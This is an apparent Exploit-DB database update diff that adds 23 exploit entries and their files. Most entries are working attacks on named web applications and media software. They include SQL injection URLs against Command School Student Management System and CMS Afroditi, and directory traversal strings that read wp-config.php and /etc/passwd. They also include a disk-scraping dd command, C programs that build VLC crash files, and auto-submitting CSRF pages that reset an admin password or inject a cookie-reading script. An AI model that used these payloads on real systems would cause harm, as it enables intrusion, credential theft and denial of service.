DB: 2015-12-13

23 new exploits

files.csv

@@ -35196,3 +35196,26 @@ id,file,description,date,author,platform,type,port
 38932,platforms/multiple/dos/38932.txt,"Avast JetDb::IsExploited4x - Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
 38933,platforms/multiple/dos/38933.txt,"Avast Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0
 38934,platforms/windows/dos/38934.txt,"Avast Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0
+38935,platforms/asp/webapps/38935.txt,"CMS Afroditi 'id' Parameter SQL Injection Vulnerablity",2013-12-30,"projectzero labs",asp,webapps,0
+38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal Vulnerability",2013-12-30,"Henri Salo",php,webapps,0
+38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability",2014-01-01,anonymous,linux,local,0
+38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Include Vulnerability",2013-12-24,"TUNISIAN CYBER",php,webapps,0
+38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
+38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 '.EAC3' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0
+38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal Vulnerability",2013-10-03,"Sisco Barrera",php,webapps,0
+38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component 'index.php' Arbitrary File Upload Vulnerability",2014-01-07,"TUNISIAN CYBER",php,webapps,0
+38944,platforms/php/webapps/38944.txt,"Command School Student Management System /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38945,platforms/php/webapps/38945.txt,"Command School Student Management System /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38946,platforms/php/webapps/38946.txt,"Command School Student Management System /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38947,platforms/php/webapps/38947.txt,"Command School Student Management System /sw/admin_sgrades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38948,platforms/php/webapps/38948.txt,"Command School Student Management System /sw/admin_media_codes_1.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38949,platforms/php/webapps/38949.txt,"Command School Student Management System /sw/admin_infraction_codes.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38950,platforms/php/webapps/38950.txt,"Command School Student Management System /sw/admin_generations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38951,platforms/php/webapps/38951.txt,"Command School Student Management System /sw/admin_relations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38952,platforms/php/webapps/38952.txt,"Command School Student Management System /sw/admin_titles.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38953,platforms/php/webapps/38953.txt,"Command School Student Management System /sw/health_allergies.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38954,platforms/php/webapps/38954.txt,"Command School Student Management System /sw/admin_school_names.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38955,platforms/php/webapps/38955.txt,"Command School Student Management System /sw/admin_subjects.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38956,platforms/php/webapps/38956.txt,"Command School Student Management System /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38957,platforms/php/webapps/38957.html,"Command School Student Management System /sw/admin_change_password.php Admin Password Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0
+38958,platforms/php/webapps/38958.html,"Command School Student Management System /sw/add_topic.php Topic Creation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0

platforms/asp/webapps/38935.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64572/info
+
+CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CMS Afroditi 1.0 is vulnerable. 
+
+http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1 

platforms/linux/local/38937.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64617/info
+
+Apache Libcloud is prone to a local information-disclosure vulnerability.
+
+Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks.
+
+Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable. 
+
+dd if=/dev/vda bs=1M | strings -n 100 > out.txt 

platforms/multiple/dos/38939.c

@@ -0,0 +1,38 @@
+source: http://www.securityfocus.com/bid/64623/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 
+
+# Exploit Title: VLC v. 1.1.11 .nsv DOS
+# Date: 3/14/2012
+# Author: Dan Fosco
+# Vendor or Software Link: www.videolan.org
+# Version: 1.1.11
+# Category: local
+# Google dork: n/a
+# Tested on: Windows XP SP3 (64-bit)
+# Demo site: n/a
+
+#include <stdio.h>
+
+int main()
+{
+	FILE *f;
+	f = fopen("dos.nsv", "w");
+	fputs("\x4e\x53\x56\x66", f);
+	fputc('\x00', f);
+	fputc('\x00', f);
+	fputc('\x00', f);
+	fputc('\x00', f);
+	fclose(f);
+	return 0;
+}
+
+//use code for creating malicious file
+
+edit:  works on 2.0.1.0
+
+

platforms/multiple/dos/38940.c

@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/64626/info
+
+VLC Media Player is prone to a denial-of-service vulnerability.
+
+Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
+
+VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 
+
+# Exploit Title: VLC v. 1.1.11 .eac3 DOS
+# Date: 3/14/2012
+# Author: Dan Fosco
+# Vendor or Software Link: www.videolan.org
+# Version: 1.1.11
+# Category:: local
+# Google dork: n/a
+# Tested on: Windows XP SP3 (64-bit)
+# Demo site: n/a
+
+#include <stdio.h>
+
+int main(int argc, char *argv[])
+{
+	FILE *f;
+	f = fopen(argv[1], "r+");
+	fseek(f, 5, SEEK_SET);
+	fputc('\x00', f);
+	fclose(f);
+	return 0;
+}
+
+//code updates eac3 file, can find samples on videolan ftp server
+
+

platforms/php/webapps/38936.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64587/info
+
+The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php 

platforms/php/webapps/38938.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/64619/info
+
+xBoard is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+xBoard 5.0, 5.5, and 6.0 are vulnerable. 
+
+http://www.example.com/xboard/view.php?post=[LFI] 

platforms/php/webapps/38942.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/64693/info
+
+SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
+
+A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.
+
+SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg
+https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de
+https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg 

platforms/php/webapps/38943.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/64705/info
+
+The Aclsfgpl component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form 

platforms/php/webapps/38944.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+
+Command School Student Management System is prone to the following security vulnerabilities:
+
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38945.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+ 
+Command School Student Management System is prone to the following security vulnerabilities:
+ 
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+ 
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+ 
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38946.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+  
+Command School Student Management System is prone to the following security vulnerabilities:
+  
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+  
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+  
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38947.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+   
+Command School Student Management System is prone to the following security vulnerabilities:
+   
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+   
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+   
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38948.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+    
+Command School Student Management System is prone to the following security vulnerabilities:
+    
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+    
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+    
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3

platforms/php/webapps/38949.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+     
+Command School Student Management System is prone to the following security vulnerabilities:
+     
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+     
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+     
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38950.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+      
+Command School Student Management System is prone to the following security vulnerabilities:
+      
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+      
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+      
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38951.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+       
+Command School Student Management System is prone to the following security vulnerabilities:
+       
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+       
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+       
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38952.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+        
+Command School Student Management System is prone to the following security vulnerabilities:
+        
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+        
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+        
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38953.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+         
+Command School Student Management System is prone to the following security vulnerabilities:
+         
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+         
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+         
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38954.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+          
+Command School Student Management System is prone to the following security vulnerabilities:
+          
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+          
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+          
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38955.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/64707/info
+           
+Command School Student Management System is prone to the following security vulnerabilities:
+           
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+           
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+           
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()

platforms/php/webapps/38956.txt

@@ -0,0 +1,82 @@
+source: http://www.securityfocus.com/bid/64707/info
+            
+Command School Student Management System is prone to the following security vulnerabilities:
+            
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+            
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+            
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+
+##############
+VULNERABILITY
+##############
+
+/Backup/backup_ray2.php (LINE: 78-126)
+
+-----------------------------------------------------------------------------
+// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
+$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
+$fp   = fopen($bkup, "w");
+
+
+// GET THE LIST OF TABLES
+$sql = "SHOW TABLES";
+$res = mysql_query($sql);
+if (!$res) die( mysql_error() );
+if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
+while ($s = mysql_fetch_array($res))
+{
+    $tables[] = $s[0];
+}
+
+
+// ITERATE OVER THE LIST OF TABLES
+foreach ($tables as $table)
+{
+
+// WRITE THE DROP TABLE STATEMENT
+    fwrite($fp,"DROP TABLE `$table`;\n");
+
+// GET THE CREATE TABLE STATEMENT
+    $res = mysql_query("SHOW CREATE TABLE `$table`");
+    if (!$res) die( mysql_error() );
+    $cre = mysql_fetch_array($res);
+    $cre[1] .= ";";
+    $txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
+    fwrite($fp, $txt . "\n");
+
+// GET THE TABLE DATA
+    $data = mysql_query("SELECT * FROM `$table`");
+    $num  = mysql_num_fields($data);
+    while ($row = mysql_fetch_array($data))
+    {
+
+// MAKE INSERT STATEMENTS FOR ALL THE VALUES
+        $txt = "INSERT INTO `$table` VALUES(";
+        for ($i=0; $i < $num; $i++)
+        {
+            $txt .= "'".mysql_real_escape_string($row[$i])."', ";
+        }
+        $txt = substr($txt, 0, -2);
+        fwrite($fp, $txt . ");\n");
+    }
+}
+// ALL DONE
+fclose($fp);
+-----------------------------------------------------------------------------
+
+#####################################################
+EXPLOIT
+#####################################################
+
+<html>
+<title>Iphobos Blog</title>
+<label><a href="http://www.example.com/sw/backup/backup_ray2.php" class="button
+white">Backup Download</a></label>
+</html>

platforms/php/webapps/38957.html

@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/64707/info
+             
+Command School Student Management System is prone to the following security vulnerabilities:
+             
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+             
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+             
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+[Change Password Admin]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="
+http://www.example.com/sw/admin_change_password.php">
+<input type="hidden" name="password" value="123456" />
+<input type="hidden" name="action" value="update" />
+</form>
+</body>
+</html>

platforms/php/webapps/38958.html

@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/64707/info
+              
+Command School Student Management System is prone to the following security vulnerabilities:
+              
+1. Multiple SQL-injection vulnerabilities
+2. A cross-site request forgery vulnerability
+3. A cross-site scripting vulnerability
+4. An HTML injection vulnerability
+5. A security-bypass vulnerability
+              
+Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
+              
+Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 
+
+[CSRF with XSS Exploit]
+
+<html>
+<body onload="document.form0.submit();">
+<form method="POST" name="form0" action="http://http://www.example.com/sw/add_topic.php">
+<input type="hidden" name="topic"
+value="<script>alert(document.cookie);</script>" />
+<input type="hidden" name="detail" value="Iphobos Blog" />
+<input type="hidden" name="Submit" value="Submit" />
+</form>
+</body>
+</html>